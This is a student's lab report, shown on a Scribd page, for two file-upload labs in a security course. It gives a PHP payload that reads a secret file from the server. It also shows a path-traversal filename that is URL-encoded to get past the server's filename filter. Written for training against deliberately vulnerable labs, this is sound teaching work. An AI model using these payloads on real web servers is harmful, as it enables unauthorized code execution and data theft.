Scribd
Upload
5 views26 pages

(IAW301) (Lab19) NguyenLamGiaBao

The document outlines a series of steps for exploiting a web application vulnerability related to file uploads. It details how to upload a PHP file disguised as an avatar to access sensitive information from the server. The process involves using tools like Burp Suite to manipulate HTTP requests and responses to achieve the exploit.

Uploaded by

Ly Phi Long (K17 CT)
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
5 views26 pages

(IAW301) (Lab19) NguyenLamGiaBao

The document outlines a series of steps for exploiting a web application vulnerability related to file uploads. It details how to upload a PHP file disguised as an avatar to access sensitive information from the server. The process involves using tools like Burp Suite to manipulate HTTP requests and responses to achieve the exploit.

Uploaded by

Ly Phi Long (K17 CT)
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 26

Nguyen Lam Gia Bao

CE170444
IAW301-Lab19
Ex 1:

1/ Access the lab


2/ Login with given cred wiener:peter

3/ Upload any picture, back to the account page. Notice that the preview of avatar is displayed
4/ In Burp, go to Proxy > HTTP history. Click ‘filter’ to open the HTTP history filter. In Filter by MIME type,
Tick on Images > apply&close.
5/ send the request GET /files/avatars/<YOUR-IMAGE> to repeater

6/ create a file name ‘exploit.php’, the content is shown below

<?php echo file_get_contents('/home/carlos/secret'); ?>


7/ Upload the PHP file through the avatar upload.

8/ In Burp Repeater, change the URL to your PHP file


GET /files/avatars/exploit.php
9/ send request and the reponse will show the content of ‘secret’ file
10/ Use the content above to solve the lab

Ex 2:

1/ Access the lab


2/ Login and upload an avatar > back to account page
3/ Send the request GET /files/avatars/<YOUR-IMAGE> to repeater

4/ create a file name ‘exploit.php’, the content is shown below

<?php echo file_get_contents('/home/carlos/secret'); ?>


5/ upload the PHP file through the avatar upload. Notice that the web seem like it does not block PHP
file
6/ In Repeater, move to the tab contain the GET /files/avatars/<YOUR-IMAGE>. Change the URL to the
exploit.php and send. But this time, instead of execute and return the result, it show the content of the
PHP file
7/ Find the request POST /my-account/avatar and send to repeater.

8/ In repeater, move to the tab contain the request POST /my-account/avatar. At the Content-
Disposition, Rename the file to include the directory traversal sequence:
Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
9/ send request. The response show that the file avatars/exploit.php has been uploaded. This indicates
that the server is removing the directory traversal sequence from the file name.
10/ Obfuscate the directory traversal sequence by URL encoding the slash character (/), resulting in:
filename="..%2fexploit.php"
11/ Send the request and observe that the message now says The file avatars/../exploit.php has been
uploaded. This indicates that the file name is being URL decoded by the server.
12/ Back to the account page
13/ Right click on the avatar image icon and select Open image in new tab
14/ change the URL to https://.../ files/exploit.php
15/ send the content above to solve the lab

You might also like